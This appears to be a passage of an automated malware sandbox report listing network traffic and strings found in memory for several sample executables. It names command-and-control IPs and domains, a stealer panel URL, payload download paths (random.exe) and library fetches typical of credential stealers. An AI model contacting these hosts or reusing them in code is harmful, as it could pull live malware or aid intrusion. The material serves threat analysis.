                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/lolz/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                              Source: global trafficDNS traffic detected: DNS query: cheapptaxysu.click
                              Source: global trafficDNS traffic detected: DNS query: www.google.com
                              Source: global trafficDNS traffic detected: DNS query: httpbin.org
                              Source: global trafficDNS traffic detected: DNS query: home.fivetk5vt.top
                              Source: global trafficDNS traffic detected: DNS query: fivetk5vt.top
                              Source: global trafficDNS traffic detected: DNS query: github.com
                              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                              Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
                              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 19 Dec 2024 13:20:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5tYH%2FZElwdGutdGI3oqzGUCdnDJCUfOSLZqy48rGvIYS0c0wT7I6142BjkEJz05fmEb%2FgKzOOp2PYPuJDz67KNSnU4VhImqAqMPpkQCetrmCt8at2yCzCeYNGh3q3EOTOlLFfeQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f47b0c1189872a5-EWR
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/mine/random.exe
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.00000000017CA000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dlli
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllw
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll;
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Z
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.00000000018BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php-
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2I
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php;
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpQ
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpS
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpdh)j
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpds
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmp, 3m20j.exe, 0000000A.00000002.2492560230.00000000017D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phper
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpy
                              Source: 3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/nal
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.00000000017CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206F9
                              Source: 3m20j.exe, 0000000A.00000002.2486440512.0000000000E07000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206c4becf79229cb002.phpser
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                              Source: 2i7672.exe, 00000005.00000003.1961167556.0000000000880000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1960896276.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                              Source: 3m20j.exe, 0000000A.00000002.2513931504.000000006C1BD000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                              Source: 3m20j.exe, 0000000A.00000002.2510990294.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                              Source: fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                              Source: 5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                              Source: svchost.exe, 00000014.00000002.2371127771.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe
                              Source: svchost.exe, 00000014.00000002.2371127771.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxex
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/
                              Source: fc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/accountname.aspx
                              Source: fc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/balance.aspx
                              Source: fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspx
                              Source: fc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/history.aspxS
                              Source: fc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://api.libertyreserve.com/beta/xml/transfer.aspx
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: 5813f66ed1.exe, 0000000C.00000003.2289418774.0000000001169000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2268653170.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2162142296.0000000005A97000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2217955118.0000000001186000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2214610379.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290875133.0000000001124000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2290637540.00000000010B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/
                              Source: 5813f66ed1.exe, 0000000C.00000003.2289309472.000000000117E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api
                              Source: 5813f66ed1.exe, 0000000C.00000002.2290875133.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiP
                              Source: 5813f66ed1.exe, 0000000C.00000003.2190681116.0000000001122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/api_&
                              Source: 5813f66ed1.exe, 0000000C.00000003.2289524633.000000000118B000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2289309472.0000000001187000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2291144627.000000000118C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apifTH
                              Source: 5813f66ed1.exe, 0000000C.00000003.2214610379.000000000117C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apitr
                              Source: 5813f66ed1.exe, 0000000C.00000003.2289524633.000000000118B000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2289309472.0000000001187000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000002.2291144627.000000000118C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click/apiwTY
                              Source: 5813f66ed1.exe, 5813f66ed1.exe, 0000000C.00000003.2162532914.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2162142296.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/api
                              Source: 5813f66ed1.exe, 0000000C.00000003.2235833487.0000000001187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cheapptaxysu.click:443/apihl
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: 3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                              Source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                              Source: 2i7672.exe, 00000005.00000003.1960896276.0000000000872000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1961193067.0000000000872000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961816047.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/
                              Source: 2i7672.exe, 00000005.00000003.1961193067.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961816047.0000000000830000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1961343768.000000000082F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/XA
                              Source: 2i7672.exe, 00000005.00000003.1961193067.000000000083C000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961600958.000000000080E000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1960896276.000000000080E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api
